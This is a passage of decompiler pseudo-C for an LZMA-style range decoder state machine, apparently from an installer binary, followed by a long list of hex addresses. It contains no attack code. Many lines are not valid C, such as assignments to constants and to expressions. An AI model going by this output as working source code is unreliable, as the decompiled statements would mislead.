							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                0x00000000
                0x00406520
                0x00406520
                0x00406524
                0x004065db
                0x004065de
                0x004065ea
                0x004064cb
                0x004064cb
                0x004064ce
                0x00406840
                0x00406840
                0x00406843
                0x00406843
                0x00406849
                0x0040684f
                0x00406855
                0x0040686f
                0x00406872
                0x00406878
                0x00406883
                0x00406885
                0x00406857
                0x00406857
                0x00406866
                0x0040686a
                0x0040686a
                0x0040688f
                0x004068b6
                0x004068b6
                0x004068bc
                0x004068bc
                0x00000000
                0x00406891
                0x00406891
                0x00406895
                0x00406a44
                0x00000000
                0x00406a44
                0x004068a1
                0x004068a8
                0x004068b0
                0x004068b3
                0x00000000
                0x004068b3
                0x0040652a
                0x0040652e
                0x00406a6f
                0x00406a6f
                0x00406a72
                0x00406a76
                0x00406a76
                0x00406534
                0x0040653a
                0x0040653d
                0x00406541
                0x00406544
                0x00406548
                0x00406a0e
                0x00406a5a
                0x00406a62
                0x00406a69
                0x00406a6b
                0x00000000
                0x00406a6b
                0x0040654e
                0x00406551
                0x00406557
                0x00406559
                0x00406559
                0x0040655c
                0x0040655f
                0x00406562
                0x00406565
                0x00406568
                0x0040656b
                0x0040656c
                0x0040656e
                0x0040656e
                0x0040656e
                0x00406571
                0x00406574
                0x00406577
                0x0040657a
                0x0040657a
                0x0040657d
                0x0040657f
                0x0040657f
                0x00406582
                0x00406582
                0x00406582
                0x00406058
                0x00406058
                0x00406061
                0x00000000
                0x00000000
                0x00406067
                0x00000000
                0x00406072
                0x00000000
                0x00000000
                0x0040607b
                0x0040607e
                0x00406081
                0x00406085
                0x00000000
                0x00000000
                0x0040608b
                0x0040608e
                0x00406090
                0x00406091
                0x00406094
                0x00406096
                0x00406097
                0x00406099
                0x0040609c
                0x004060a1
                0x004060a6
                0x004060af
                0x004060c2
                0x004060c5
                0x004060d1
                0x004060f9
                0x004060fb
                0x00406109
                0x00406109
                0x0040610d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004060fd
                0x004060fd
                0x00406100
                0x00406101
                0x00406101
                0x00000000
                0x004060fd
                0x004060d7
                0x004060dc
                0x004060dc
                0x004060e5
                0x004060ed
                0x004060f0
                0x00000000
                0x004060f6
                0x004060f6
                0x00000000
                0x004060f6
                0x00000000
                0x00406113
                0x00406113
                0x00406117
                0x004069c3
                0x00000000
                0x004069c3
                0x00406120
                0x00406130
                0x00406133
                0x00406136
                0x00406136
                0x00406136
                0x00406139
                0x0040613d
                0x00000000
                0x00000000
                0x0040613f
                0x00406145
                0x0040616f
                0x00406175
                0x0040617c
                0x00000000
                0x0040617c
                0x0040614b
                0x0040614e
                0x00406153
                0x00406153
                0x0040615e
                0x00406166
                0x00406169
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061ae
                0x004061b4
                0x004061b7
                0x004061c4
                0x004061cc
                0x00000000
                0x00000000
                0x00406183
                0x00406183
                0x00406187
                0x004069d2
                0x00000000
                0x004069d2
                0x00406193
                0x0040619e
                0x0040619e
                0x0040619e
                0x004061a1
                0x004061a4
                0x004061a7
                0x004061ac
                0x00000000
                0x00000000
